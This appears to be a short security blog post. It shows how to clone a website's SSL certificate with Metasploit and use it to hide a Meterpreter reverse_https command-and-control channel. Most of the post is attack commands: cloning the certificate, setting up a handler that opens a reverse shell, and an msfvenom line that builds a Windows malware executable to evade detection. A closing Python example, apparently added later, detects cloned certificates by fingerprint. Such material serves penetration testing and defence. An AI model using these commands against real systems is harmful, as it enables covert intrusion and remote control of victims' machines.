
Impersonate SSL - MSF Bypass Detection

 ·  ☕ 1 min read  ·  🐱 thik

Clone SSL Certificate

Did you know that we can clone the SSL certificate of any other website by using a module in the Metasploit Framework that was created by Chris John Riley? The cloned certificate is saved in PEM format, and it can also be used with every type of module in Metasploit.

To clone a certificate, we can use the following commands:

use auxiliary/gather/impersonate_ssl
set rhosts https://example.com/
exploit

SSL certificate cloning

As the image above shows, we have successfully cloned the certificate.

Meterpreter Using SSL Connection

Below is a test that uses the cloned SSL certificate for the connection between the Attacker PC and the Victim PC, using an HTTPS reverse shell.

Open the Metasploit Framework terminal, then enter the following commands:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.xxx.xxx
set lport xxx
set stagerverifysslcert true
set handlersslcert /xxx/xxx/xxx/cert.pem
exploit

Generate HTTPS Malicious Payload

Create the malware with Msfvenom and select the HTTPS reverse shell.

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.xxx.xxx lport=xxx -f exe -b '\x00' -o ~/Desktop/s0rry.exe

Generate Payload

Exploited

Test running the malware on the Windows operating system.

Exploited

Success!!! The C2 is now running over SSL encryption.
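For the monitoring side of the technique above, an added example (not from the original post): a certificate cloned this way is generated locally, so it can repeat the genuine certificate's names but not its key, and its fingerprint differs from the one the real site serves. The log layout, field names, addresses and fingerprints below are constructed assumptions.

```python
import ipaddress

# Constructed baseline: SHA-256 fingerprints the genuine site is known to serve
# (placeholder values; in practice taken from your own certificate inventory).
KNOWN_GOOD = {"example.com": {"aa" * 32}}

# Constructed TLS log rows (assumed layout):
# ts, client, server, certificate subject CN, certificate SHA-256, chain validation
_ROWS = [
    ("1700000000", "10.0.0.5", "198.51.100.10", "example.com", "aa" * 32, "ok"),
    ("1700000050", "10.0.0.7", "192.168.1.50", "example.com", "bb" * 32,
     "self signed certificate"),
    ("1700000090", "10.0.0.7", "203.0.113.9", "other.test", "cc" * 32, "ok"),
]
SAMPLE_LOG = "\n".join("\t".join(row) for row in _ROWS)


def find_impersonated(log_text, known_good):
    """Flag sessions whose certificate claims a baselined name but whose
    fingerprint is not one the genuine site serves."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split("\t")
        if len(fields) != 6:
            continue  # skip malformed lines
        ts, client, server, subject, fp, validation = fields
        expected = known_good.get(subject.lower())
        if expected is None or fp.lower() in expected:
            continue  # name not baselined, or genuine certificate
        reasons = ["fingerprint not in baseline"]
        if validation != "ok":
            reasons.append("chain validation: " + validation)
        try:
            if ipaddress.ip_address(server).is_private:
                reasons.append("public name served from private address")
        except ValueError:
            pass  # server field was not an IP address
        findings.append({"ts": int(ts), "client": client, "server": server,
                         "subject": subject, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_impersonated(SAMPLE_LOG, KNOWN_GOOD):
        print(finding)
```

A legitimate certificate renewal also changes the fingerprint, so the baseline has to be refreshed on rotation. The validation result and the address check help separate a renewal from a locally generated copy.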

WRITTEN BY
thik
Security Researcher